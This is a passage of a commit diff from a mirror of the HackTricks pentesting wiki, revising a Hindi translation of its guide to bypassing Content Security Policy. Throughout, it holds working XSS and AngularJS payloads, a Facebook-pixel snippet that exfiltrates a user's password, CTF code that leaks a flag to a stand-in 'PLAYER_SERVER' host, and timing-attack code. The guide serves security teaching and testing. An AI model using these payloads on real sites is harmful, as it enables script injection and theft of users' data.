mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/pentesting-web/content-security-policy-csp-bypass/READM
This commit is contained in:
		
							parent
							
								
									408ba25f8d
								
							
						
					
					
						commit
						7f2714488d
					
				@ -4,7 +4,7 @@
 | 
			
		||||
 | 
			
		||||
## What is CSP
 | 
			
		||||
 | 
			
		||||
Content Security Policy (CSP) एक ब्राउज़र तकनीक के रूप में पहचानी जाती है, जिसका मुख्य उद्देश्य **क्रॉस-साइट स्क्रिप्टिंग (XSS)** जैसे हमलों से सुरक्षा करना है। यह उन पथों और स्रोतों को परिभाषित और विस्तृत करके कार्य करता है जिनसे संसाधनों को ब्राउज़र द्वारा सुरक्षित रूप से लोड किया जा सकता है। ये संसाधन छवियों, फ्रेमों और जावास्क्रिप्ट जैसे विभिन्न तत्वों को शामिल करते हैं। उदाहरण के लिए, एक नीति एक ही डोमेन (स्वयं) से संसाधनों को लोड और निष्पादित करने की अनुमति दे सकती है, जिसमें इनलाइन संसाधन और `eval`, `setTimeout`, या `setInterval` जैसी कार्यों के माध्यम से स्ट्रिंग कोड का निष्पादन शामिल है।
 | 
			
		||||
Content Security Policy (CSP) एक ब्राउज़र तकनीक के रूप में पहचानी जाती है, जिसका मुख्य उद्देश्य **क्रॉस-साइट स्क्रिप्टिंग (XSS)** जैसे हमलों से सुरक्षा करना है। यह उन पथों और स्रोतों को परिभाषित और विस्तृत करके कार्य करता है जिनसे संसाधनों को ब्राउज़र द्वारा सुरक्षित रूप से लोड किया जा सकता है। ये संसाधन छवियों, फ्रेमों और जावास्क्रिप्ट जैसे विभिन्न तत्वों को शामिल करते हैं। उदाहरण के लिए, एक नीति एक ही डोमेन (self) से संसाधनों को लोड और निष्पादित करने की अनुमति दे सकती है, जिसमें इनलाइन संसाधन और `eval`, `setTimeout`, या `setInterval` जैसी कार्यों के माध्यम से स्ट्रिंग कोड का निष्पादन शामिल है।
 | 
			
		||||
 | 
			
		||||
CSP का कार्यान्वयन **प्रतिक्रिया हेडर** के माध्यम से या **HTML पृष्ठ में मेटा तत्वों को शामिल करके** किया जाता है। इस नीति का पालन करते हुए, ब्राउज़र सक्रिय रूप से इन शर्तों को लागू करते हैं और तुरंत किसी भी पहचानी गई उल्लंघनों को ब्लॉक कर देते हैं।
 | 
			
		||||
 | 
			
		||||
@ -91,7 +91,7 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
 | 
			
		||||
- `'sha256-<hash>'`: एक विशिष्ट sha256 हैश के साथ स्क्रिप्ट को व्हाइटलिस्ट करता है।
 | 
			
		||||
- `'strict-dynamic'`: यदि इसे nonce या हैश द्वारा व्हाइटलिस्ट किया गया है तो किसी भी स्रोत से स्क्रिप्ट लोड करने की अनुमति देता है।
 | 
			
		||||
- `'host'`: एक विशिष्ट होस्ट निर्दिष्ट करता है, जैसे `example.com`।
 | 
			
		||||
- `https:`: उन URLs को प्रतिबंधित करता है जो HTTPS का उपयोग करते हैं।
 | 
			
		||||
- `https:`: URLs को उन पर प्रतिबंधित करता है जो HTTPS का उपयोग करते हैं।
 | 
			
		||||
- `blob:`: Blob URLs (जैसे, JavaScript के माध्यम से बनाए गए Blob URLs) से संसाधनों को लोड करने की अनुमति देता है।
 | 
			
		||||
- `filesystem:`: फ़ाइल सिस्टम से संसाधनों को लोड करने की अनुमति देता है।
 | 
			
		||||
- `'report-sample'`: उल्लंघन रिपोर्ट में उल्लंघन करने वाले कोड का एक नमूना शामिल करता है (डीबगिंग के लिए उपयोगी)।
 | 
			
		||||
@ -105,9 +105,9 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
 | 
			
		||||
```yaml
 | 
			
		||||
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
 | 
			
		||||
```
 | 
			
		||||
Working payload: `"/><script>alert(1);</script>`
 | 
			
		||||
काम करने वाला पेलोड: `"/><script>alert(1);</script>`
 | 
			
		||||
 | 
			
		||||
#### self + 'unsafe-inline' via Iframes
 | 
			
		||||
#### Iframes के माध्यम से self + 'unsafe-inline'
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
csp-bypass-self-+-unsafe-inline-with-iframes.md
 | 
			
		||||
@ -139,7 +139,7 @@ Content-Security-Policy: script-src 'self' https://google.com https: data *;
 | 
			
		||||
```
 | 
			
		||||
### Lack of object-src and default-src
 | 
			
		||||
 | 
			
		||||
> [!CAUTION] > **ऐसा लगता है कि यह अब काम नहीं कर रहा है**
 | 
			
		||||
> [!CAUTION] > **यह लगता है कि यह अब काम नहीं कर रहा है**
 | 
			
		||||
```yaml
 | 
			
		||||
Content-Security-Policy: script-src 'self' ;
 | 
			
		||||
```
 | 
			
		||||
@ -176,7 +176,7 @@ Content-Security-Policy: script-src 'self';  object-src 'none' ;
 | 
			
		||||
```yaml
 | 
			
		||||
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
 | 
			
		||||
```
 | 
			
		||||
एक कमजोर संस्करण का एंगुलर लोड करें और मनमाना JS निष्पादित करें:
 | 
			
		||||
एक कमजोर संस्करण का angular लोड करें और मनमाना JS निष्पादित करें:
 | 
			
		||||
```xml
 | 
			
		||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
 | 
			
		||||
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
 | 
			
		||||
@ -197,10 +197,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
 | 
			
		||||
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
 | 
			
		||||
>
 | 
			
		||||
```
 | 
			
		||||
#### Angular + एक लाइब्रेरी का उपयोग करते हुए Payloads जो `window` ऑब्जेक्ट लौटाती हैं ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 | 
			
		||||
#### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> यह पोस्ट दिखाती है कि आप `cdn.cloudflare.com` (या किसी अन्य अनुमत JS लाइब्रेरी रिपॉजिटरी) से सभी **लाइब्रेरीज़** को **लोड** कर सकते हैं, प्रत्येक लाइब्रेरी से सभी जोड़ी गई फ़ंक्शंस को निष्पादित कर सकते हैं, और **यह जांच सकते हैं कि कौन से फ़ंक्शंस कौन सी लाइब्रेरीज़ से `window` ऑब्जेक्ट लौटाते हैं**।
 | 
			
		||||
> यह पोस्ट दिखाता है कि आप `cdn.cloudflare.com` (या किसी अन्य अनुमत JS लाइब्रेरी रिपॉजिटरी) से सभी **लाइब्रेरीज़** को **लोड** कर सकते हैं, प्रत्येक लाइब्रेरी से सभी जोड़े गए फ़ंक्शंस को निष्पादित कर सकते हैं, और **यह जांच सकते हैं कि कौन से फ़ंक्शंस कौन सी लाइब्रेरीज़ से `window` ऑब्जेक्ट लौटाते हैं**।
 | 
			
		||||
```markup
 | 
			
		||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
 | 
			
		||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 | 
			
		||||
@ -262,7 +262,7 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
 | 
			
		||||
```
 | 
			
		||||
#### www.google.com का उपयोग करके ओपन रीडायरेक्ट का दुरुपयोग
 | 
			
		||||
 | 
			
		||||
निम्नलिखित URL example.com पर रीडायरेक्ट करता है (यहां से):
 | 
			
		||||
निम्नलिखित URL example.com पर रीडायरेक्ट करता है (से [यहाँ](https://www.landh.tech/blog/20240304-google-hack-50000/)):
 | 
			
		||||
```
 | 
			
		||||
https://www.google.com/amp/s/example.com/
 | 
			
		||||
```
 | 
			
		||||
@ -309,7 +309,7 @@ https://www.youtube.com/oembed?callback=alert;
 | 
			
		||||
```
 | 
			
		||||
Content-Security-Policy: default-src 'self’ www.facebook.com;
 | 
			
		||||
```
 | 
			
		||||
or
 | 
			
		||||
या
 | 
			
		||||
```
 | 
			
		||||
Content-Security-Policy: connect-src www.facebook.com;
 | 
			
		||||
```
 | 
			
		||||
@ -318,9 +318,9 @@ Content-Security-Policy: connect-src www.facebook.com;
 | 
			
		||||
1. यहाँ एक Facebook Developer खाता बनाएं।
 | 
			
		||||
2. एक नया "Facebook Login" ऐप बनाएं और "Website" चुनें।
 | 
			
		||||
3. "Settings -> Basic" पर जाएं और अपना "App ID" प्राप्त करें।
 | 
			
		||||
4. लक्षित साइट पर, जिससे आप डेटा एक्सफिल्ट्रेट करना चाहते हैं, आप "customEvent" और डेटा पेलोड के माध्यम से Facebook SDK गैजेट "fbq" का सीधे उपयोग करके डेटा एक्सफिल्ट्रेट कर सकते हैं।
 | 
			
		||||
4. उस लक्षित साइट पर जहां आप डेटा एक्सफिल्ट्रेट करना चाहते हैं, आप "customEvent" और डेटा पेलोड के माध्यम से Facebook SDK गैजेट "fbq" का सीधे उपयोग करके डेटा एक्सफिल्ट्रेट कर सकते हैं।
 | 
			
		||||
5. अपने ऐप के "Event Manager" पर जाएं और उस ऐप्लिकेशन का चयन करें जिसे आपने बनाया है (ध्यान दें कि इवेंट मैनेजर एक URL में पाया जा सकता है जो इस तरह का है: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events)।
 | 
			
		||||
6. "Test Events" टैब का चयन करें ताकि आप "आपकी" वेबसाइट द्वारा भेजे जा रहे इवेंट्स को देख सकें।
 | 
			
		||||
6. "Test Events" टैब का चयन करें ताकि "आपकी" वेबसाइट द्वारा भेजे जा रहे इवेंट्स को देखा जा सके।
 | 
			
		||||
 | 
			
		||||
फिर, पीड़ित पक्ष पर, आप Facebook ट्रैकिंग पिक्सेल को हमलावर के Facebook डेवलपर खाता ऐप-आईडी की ओर इंगित करने और इस तरह का एक कस्टम इवेंट जारी करने के लिए निम्नलिखित कोड निष्पादित करते हैं:
 | 
			
		||||
```JavaScript
 | 
			
		||||
@ -339,9 +339,9 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 | 
			
		||||
```html
 | 
			
		||||
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
 | 
			
		||||
```
 | 
			
		||||
ब्राउज़र अंततः `https://example.com/scripts/angular/angular.js` को लोड करेगा।
 | 
			
		||||
ब्राउज़र अंततः `https://example.com/scripts/angular/angular.js` लोड करेगा।
 | 
			
		||||
 | 
			
		||||
यह काम करता है क्योंकि ब्राउज़र के लिए, आप `https://example.com/scripts/react/` के तहत स्थित `..%2fangular%2fangular.js` नामक फ़ाइल को लोड कर रहे हैं, जो CSP के अनुरूप है।
 | 
			
		||||
यह काम करता है क्योंकि ब्राउज़र के लिए, आप `https://example.com/scripts/react/` के तहत स्थित `..%2fangular%2fangular.js` नामक फ़ाइल लोड कर रहे हैं, जो CSP के अनुरूप है।
 | 
			
		||||
 | 
			
		||||
∑, वे इसे डिकोड करेंगे, प्रभावी रूप से `https://example.com/scripts/react/../angular/angular.js` का अनुरोध करेंगे, जो `https://example.com/scripts/angular/angular.js` के बराबर है।
 | 
			
		||||
 | 
			
		||||
@ -383,7 +383,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 | 
			
		||||
```
 | 
			
		||||
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
 | 
			
		||||
```
 | 
			
		||||
एक CSP नीति जो Angular JS एप्लिकेशन में स्क्रिप्ट लोडिंग के लिए डोमेन को व्हाइटलिस्ट करती है, को कॉलबैक फ़ंक्शंस और कुछ कमजोर वर्गों के उपयोग के माध्यम से बायपास किया जा सकता है। इस तकनीक पर अधिक जानकारी इस [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22) पर उपलब्ध एक विस्तृत गाइड में मिल सकती है।
 | 
			
		||||
एक CSP नीति जो Angular JS एप्लिकेशन में स्क्रिप्ट लोडिंग के लिए डोमेन को व्हाइटलिस्ट करती है, को कॉलबैक फ़ंक्शंस और कुछ कमजोर वर्गों के उपयोग के माध्यम से बायपास किया जा सकता है। इस तकनीक पर अधिक जानकारी एक विस्तृत गाइड में उपलब्ध है जो इस [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22) पर है।
 | 
			
		||||
 | 
			
		||||
कार्यशील पेलोड:
 | 
			
		||||
```html
 | 
			
		||||
@ -429,15 +429,15 @@ content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
 | 
			
		||||
 | 
			
		||||
### लटकते मार्कअप के साथ CSP बायपास
 | 
			
		||||
 | 
			
		||||
[यहाँ पढ़ें](../dangling-markup-html-scriptless-injection/index.html)।
 | 
			
		||||
[यहाँ पढ़ें](../dangling-markup-html-scriptless-injection/index.html).
 | 
			
		||||
 | 
			
		||||
### 'unsafe-inline'; img-src \*; XSS के माध्यम से
 | 
			
		||||
```
 | 
			
		||||
default-src 'self' 'unsafe-inline'; img-src *;
 | 
			
		||||
```
 | 
			
		||||
`'unsafe-inline'` का मतलब है कि आप कोड के अंदर कोई भी स्क्रिप्ट चला सकते हैं (XSS कोड चला सकता है) और `img-src *` का मतलब है कि आप वेबपेज पर किसी भी संसाधन से कोई भी छवि उपयोग कर सकते हैं।
 | 
			
		||||
`'unsafe-inline'` का मतलब है कि आप कोड के अंदर कोई भी स्क्रिप्ट चला सकते हैं (XSS कोड चला सकता है) और `img-src *` का मतलब है कि आप वेबपेज पर किसी भी संसाधन से कोई भी इमेज उपयोग कर सकते हैं।
 | 
			
		||||
 | 
			
		||||
आप इस CSP को छवियों के माध्यम से डेटा को एक्सफिल्ट्रेट करके बायपास कर सकते हैं (इस अवसर पर XSS एक CSRF का दुरुपयोग करता है जहां बॉट द्वारा सुलभ एक पृष्ठ में एक SQLi है, और एक छवि के माध्यम से ध्वज निकालता है):
 | 
			
		||||
आप इस CSP को इमेज के माध्यम से डेटा को एक्सफिल्ट्रेट करके बायपास कर सकते हैं (इस अवसर पर XSS एक CSRF का दुरुपयोग करता है जहां बॉट द्वारा एक्सेस की जाने वाली एक पृष्ठ में एक SQLi है, और एक इमेज के माध्यम से फ्लैग को निकालता है):
 | 
			
		||||
```javascript
 | 
			
		||||
<script>
 | 
			
		||||
fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
 | 
			
		||||
@ -446,41 +446,41 @@ Image().src='http://PLAYER_SERVER/?'+_)
 | 
			
		||||
```
 | 
			
		||||
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 | 
			
		||||
 | 
			
		||||
आप इस कॉन्फ़िगरेशन का दुरुपयोग करके **एक छवि के अंदर डाले गए जावास्क्रिप्ट कोड को लोड** कर सकते हैं। यदि उदाहरण के लिए, पृष्ठ ट्विटर से छवियों को लोड करने की अनुमति देता है। आप **एक विशेष छवि तैयार** कर सकते हैं, **उसे ट्विटर पर अपलोड** कर सकते हैं और "**unsafe-inline**" का दुरुपयोग करके **एक JS कोड को निष्पादित** कर सकते हैं (जैसे एक सामान्य XSS) जो **छवि को लोड** करेगा, **उससे JS निकाल**ेगा और **इसे निष्पादित** करेगा: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 | 
			
		||||
आप इस कॉन्फ़िगरेशन का दुरुपयोग करके **एक छवि के अंदर डाले गए जावास्क्रिप्ट कोड को लोड** कर सकते हैं। यदि उदाहरण के लिए, पृष्ठ ट्विटर से छवियों को लोड करने की अनुमति देता है। आप **एक विशेष छवि तैयार** कर सकते हैं, **उसे ट्विटर पर अपलोड** कर सकते हैं और "**unsafe-inline**" का दुरुपयोग करके **एक JS कोड को निष्पादित** कर सकते हैं (जैसे एक सामान्य XSS) जो **छवि को लोड** करेगा, **उससे JS को निकाल**ेगा और **उसे निष्पादित** करेगा: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 | 
			
		||||
 | 
			
		||||
### सेवा कार्यकर्ताओं के साथ
 | 
			
		||||
### With Service Workers
 | 
			
		||||
 | 
			
		||||
सेवा कार्यकर्ताओं की **`importScripts`** फ़ंक्शन CSP द्वारा सीमित नहीं है:
 | 
			
		||||
Service workers **`importScripts`** फ़ंक्शन CSP द्वारा सीमित नहीं है:
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
../xss-cross-site-scripting/abusing-service-workers.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
### नीति इंजेक्शन
 | 
			
		||||
### Policy Injection
 | 
			
		||||
 | 
			
		||||
**शोध:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
 | 
			
		||||
 | 
			
		||||
#### क्रोम
 | 
			
		||||
#### Chrome
 | 
			
		||||
 | 
			
		||||
यदि एक **पैरामीटर** जो आपने भेजा है, **नीति के घोषणा** के अंदर **पेस्ट** किया जा रहा है, तो आप **नीति** को इस तरह से **बदल** सकते हैं कि यह **बेकार** हो जाए। आप इन बायपास में से किसी के साथ **स्क्रिप्ट 'unsafe-inline'** की **अनुमति** दे सकते हैं:
 | 
			
		||||
```bash
 | 
			
		||||
script-src-elem *; script-src-attr *
 | 
			
		||||
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
 | 
			
		||||
```
 | 
			
		||||
क्योंकि यह निर्देश **मौजूदा script-src निर्देशों को ओवरराइट** करेगा।\
 | 
			
		||||
क्योंकि यह निर्देश **मौजूदा script-src निर्देशों को अधिलेखित** करेगा।\
 | 
			
		||||
आप यहाँ एक उदाहरण पा सकते हैं: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
 | 
			
		||||
 | 
			
		||||
#### Edge
 | 
			
		||||
 | 
			
		||||
Edge में यह बहुत सरल है। यदि आप CSP में केवल यह जोड़ सकते हैं: **`;_`** **Edge** पूरी **नीति** को **छोड़** देगा।\
 | 
			
		||||
Edge में यह बहुत सरल है। यदि आप CSP में केवल यह जोड़ सकते हैं: **`;_`** **Edge** पूरी **नीति** को **गिरा** देगा।\
 | 
			
		||||
उदाहरण: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
 | 
			
		||||
 | 
			
		||||
### img-src \*; XSS (iframe) के माध्यम से - टाइम अटैक
 | 
			
		||||
### img-src \*; XSS (iframe) के माध्यम से - समय हमला
 | 
			
		||||
 | 
			
		||||
निर्देश `'unsafe-inline'` की कमी पर ध्यान दें।\
 | 
			
		||||
इस बार आप पीड़ित को **XSS** के माध्यम से **आपके नियंत्रण** में एक पृष्ठ **लोड** करने के लिए मजबूर कर सकते हैं `<iframe` के साथ। इस बार आप पीड़ित को उस पृष्ठ तक पहुँचने के लिए मजबूर करेंगे जहाँ से आप जानकारी निकालना चाहते हैं (**CSRF**)। आप पृष्ठ की सामग्री तक पहुँच नहीं सकते, लेकिन यदि किसी तरह आप **पृष्ठ को लोड होने में लगने वाले समय को नियंत्रित कर सकते हैं** तो आप आवश्यक जानकारी निकाल सकते हैं।
 | 
			
		||||
इस बार आप पीड़ित को **XSS** के माध्यम से **आपके नियंत्रण** में एक पृष्ठ **लोड** करने के लिए मजबूर कर सकते हैं `<iframe` के साथ। इस बार आप पीड़ित को उस पृष्ठ तक पहुँचाने जा रहे हैं जहाँ से आप जानकारी निकालना चाहते हैं (**CSRF**)। आप पृष्ठ की सामग्री तक पहुँच नहीं सकते, लेकिन यदि किसी तरह आप **पृष्ठ को लोड करने में लगने वाले समय को नियंत्रित कर सकते हैं** तो आप आवश्यक जानकारी निकाल सकते हैं।
 | 
			
		||||
 | 
			
		||||
इस बार एक **झंडा** निकाला जाएगा, जब भी एक **चर सही तरीके से अनुमानित** किया जाता है SQLi के माध्यम से, **प्रतिक्रिया** **अधिक समय** लेती है नींद फ़ंक्शन के कारण। फिर, आप झंडा निकालने में सक्षम होंगे:
 | 
			
		||||
इस बार एक **झंडा** निकाला जाएगा, जब भी एक **चर सही अनुमानित** किया जाता है SQLi के माध्यम से, **प्रतिक्रिया** **अधिक समय** लेती है नींद फ़ंक्शन के कारण। फिर, आप झंडा निकालने में सक्षम होंगे:
 | 
			
		||||
```html
 | 
			
		||||
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
 | 
			
		||||
<iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
 | 
			
		||||
@ -550,7 +550,7 @@ run()
 | 
			
		||||
 | 
			
		||||
[**इस CTF लेखन में**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP को एक अनुमत iframe के अंदर एक अधिक प्रतिबंधात्मक CSP को इंजेक्ट करके बायपास किया गया है जो एक विशिष्ट JS फ़ाइल को लोड करने की अनुमति नहीं देता है, जो फिर, **प्रोटोटाइप प्रदूषण** या **DOM क्लॉबरिंग** के माध्यम से **एक अलग स्क्रिप्ट का दुरुपयोग करके एक मनमाना स्क्रिप्ट लोड करने** की अनुमति देता है।
 | 
			
		||||
 | 
			
		||||
आप **`csp`** विशेषता के साथ **एक iframe का CSP प्रतिबंधित कर सकते हैं**:
 | 
			
		||||
आप **`csp`** विशेषता के साथ **एक Iframe का CSP प्रतिबंधित कर सकते हैं**:
 | 
			
		||||
```html
 | 
			
		||||
<iframe
 | 
			
		||||
src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
 | 
			
		||||
@ -568,7 +568,7 @@ content="script-src 'self'
 | 
			
		||||
```
 | 
			
		||||
### JS exfiltration with Content-Security-Policy-Report-Only
 | 
			
		||||
 | 
			
		||||
यदि आप सर्वर को **`Content-Security-Policy-Report-Only`** हेडर के साथ **आपके द्वारा नियंत्रित मान** के साथ प्रतिक्रिया देने में सक्षम हैं (शायद CRLF के कारण), तो आप इसे अपने सर्वर की ओर इंगित कर सकते हैं और यदि आप **JS सामग्री** को **`<script>`** के साथ लपेटते हैं और क्योंकि CSP द्वारा `unsafe-inline` की अनुमति नहीं है, तो यह **CSP त्रुटि** को **प्रेरित** करेगा और स्क्रिप्ट का एक भाग (संवेदनशील जानकारी वाला) `Content-Security-Policy-Report-Only` से सर्वर पर भेजा जाएगा।
 | 
			
		||||
यदि आप सर्वर को **`Content-Security-Policy-Report-Only`** हेडर के साथ **आपके द्वारा नियंत्रित मान** के साथ प्रतिक्रिया देने में सफल होते हैं (शायद CRLF के कारण), तो आप इसे अपने सर्वर की ओर इंगित कर सकते हैं और यदि आप **JS सामग्री** को **`<script>`** के साथ लपेटते हैं और क्योंकि CSP द्वारा `unsafe-inline` की अनुमति नहीं है, तो यह **CSP त्रुटि** को **प्रेरित** करेगा और स्क्रिप्ट का एक भाग (संवेदनशील जानकारी वाला) `Content-Security-Policy-Report-Only` से सर्वर पर भेजा जाएगा।
 | 
			
		||||
 | 
			
		||||
उदाहरण के लिए [**इस CTF लेख को देखें**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
 | 
			
		||||
 | 
			
		||||
@ -579,38 +579,17 @@ document.querySelector("DIV").innerHTML =
 | 
			
		||||
```
 | 
			
		||||
### CSP और Iframe के साथ जानकारी लीक करना
 | 
			
		||||
 | 
			
		||||
- एक `iframe` बनाया जाता है जो एक URL की ओर इशारा करता है (चलो इसे `https://example.redirect.com` कहते हैं) जिसे CSP द्वारा अनुमति दी गई है।
 | 
			
		||||
- एक `iframe` बनाया जाता है जो एक URL (चलो इसे `https://example.redirect.com` कहते हैं) की ओर इशारा करता है जिसे CSP द्वारा अनुमति दी गई है।
 | 
			
		||||
- यह URL फिर एक गुप्त URL (जैसे, `https://usersecret.example2.com`) की ओर रीडायरेक्ट करता है जो CSP द्वारा **अनुमति नहीं दी गई** है।
 | 
			
		||||
- `securitypolicyviolation` इवेंट को सुनकर, कोई `blockedURI` प्रॉपर्टी को कैप्चर कर सकता है। यह प्रॉपर्टी ब्लॉक किए गए URI के डोमेन को प्रकट करती है, जिससे प्रारंभिक URL द्वारा रीडायरेक्ट किए गए गुप्त डोमेन का लीक होना होता है।
 | 
			
		||||
 | 
			
		||||
यह ध्यान देने योग्य है कि Chrome और Firefox जैसे ब्राउज़रों में CSP के संबंध में iframes को संभालने में विभिन्न व्यवहार होते हैं, जो संवेदनशील जानकारी के संभावित लीक का कारण बन सकते हैं।
 | 
			
		||||
 | 
			
		||||
एक और तकनीक CSP का स्वयं शोषण करना है ताकि गुप्त सबडोमेन का अनुमान लगाया जा सके। यह विधि एक बाइनरी सर्च एल्गोरिदम पर निर्भर करती है और CSP को विशिष्ट डोमेन को शामिल करने के लिए समायोजित करती है जो जानबूझकर ब्लॉक किए गए हैं। उदाहरण के लिए, यदि गुप्त सबडोमेन अज्ञात वर्णों से बना है, तो आप CSP निर्देश को संशोधित करके इन सबडोमेनों को ब्लॉक या अनुमति देने के लिए विभिन्न सबडोमेनों का क्रमिक परीक्षण कर सकते हैं। यहाँ एक स्निपेट है जो दिखाता है कि CSP को इस विधि को सुविधाजनक बनाने के लिए कैसे सेट किया जा सकता है:
 | 
			
		||||
एक और तकनीक CSP का स्वयं शोषण करना है ताकि गुप्त सबडोमेन का अनुमान लगाया जा सके। यह विधि एक बाइनरी सर्च एल्गोरिदम पर निर्भर करती है और CSP को विशिष्ट डोमेन को शामिल करने के लिए समायोजित करती है जिन्हें जानबूझकर ब्लॉक किया गया है। उदाहरण के लिए, यदि गुप्त सबडोमेन अज्ञात वर्णों से बना है, तो आप CSP निर्देश को संशोधित करके इन सबडोमेन को ब्लॉक या अनुमति देने के लिए विभिन्न सबडोमेन का क्रमिक परीक्षण कर सकते हैं। यहाँ एक स्निपेट है जो दिखाता है कि CSP को इस विधि को सुविधाजनक बनाने के लिए कैसे सेट किया जा सकता है:
 | 
			
		||||
```markdown
 | 
			
		||||
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
 | 
			
		||||
```
 | 
			
		||||
CSP द्वारा अवरुद्ध या अनुमत अनुरोधों की निगरानी करके, कोई भी गुप्त उपडोमेन में संभावित वर्णों को संकीर्ण कर सकता है, अंततः पूर्ण URL का पता लगा सकता है।
 | 
			
		||||
 | 
			
		||||
दोनों विधियाँ CSP कार्यान्वयन और ब्राउज़रों में व्यवहार के बारीकियों का लाभ उठाती हैं, यह प्रदर्शित करते हुए कि कैसे प्रतीत होता है कि सुरक्षित नीतियाँ अनजाने में संवेदनशील जानकारी को लीक कर सकती हैं।
 | 
			
		||||
 | 
			
		||||
[**यहाँ**](https://ctftime.org/writeup/29310) से ट्रिक।
 | 
			
		||||
 | 
			
		||||
## CSP को बायपास करने के लिए असुरक्षित तकनीकें
 | 
			
		||||
 | 
			
		||||
### बहुत सारे पैरामीटर होने पर PHP त्रुटियाँ
 | 
			
		||||
 | 
			
		||||
[**इस वीडियो में टिप्पणी की गई अंतिम तकनीक**](https://www.youtube.com/watch?v=Sm4G6cAHjWM) के अनुसार, बहुत सारे पैरामीटर (1001 GET पैरामीटर, हालांकि आप इसे POST पैरामीटर और 20 से अधिक फ़ाइलों के साथ भी कर सकते हैं) भेजने पर। PHP वेब कोड में कोई भी परिभाषित **`header()`** **नहीं भेजा जाएगा** क्योंकि यह त्रुटि उत्पन्न करेगा।
 | 
			
		||||
 | 
			
		||||
### PHP प्रतिक्रिया बफर ओवरलोड
 | 
			
		||||
 | 
			
		||||
PHP को डिफ़ॉल्ट रूप से **4096** बाइट्स तक प्रतिक्रिया को **बफरिंग** करने के लिए जाना जाता है। इसलिए, यदि PHP एक चेतावनी दिखा रहा है, तो **चेतावनियों के अंदर पर्याप्त डेटा प्रदान करके**, **प्रतिक्रिया** **CSP हेडर** से **पहले** **भेजी जाएगी**, जिससे हेडर को अनदेखा किया जाएगा।\
 | 
			
		||||
फिर, तकनीक मूल रूप से **चेतावनियों के साथ प्रतिक्रिया बफर को भरने** में है ताकि CSP हेडर न भेजा जाए।
 | 
			
		||||
 | 
			
		||||
[**इस लेख**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points) से विचार।
 | 
			
		||||
 | 
			
		||||
### त्रुटि पृष्ठ को फिर से लिखें
 | 
			
		||||
 | 
			
		||||
[**इस लेख**](https://blog.ssrf.kr/69) से ऐसा लगता है कि CSP सुरक्षा को बायपास करना संभव था एक त्रुटि पृष्ठ (संभावित रूप से CSP के बिना) को लोड करके और इसकी सामग्री को फिर से लिखकर।
 | 
			
		||||
CSP द्वारा अवरुद्ध या अनुमति प्राप्त अनुरोधों की निगरानी करके, कोई भी गुप्त उपडोमेन में संभावित वर्णों को संकीर्ण कर सकता है, अंत
 | 
			
		||||
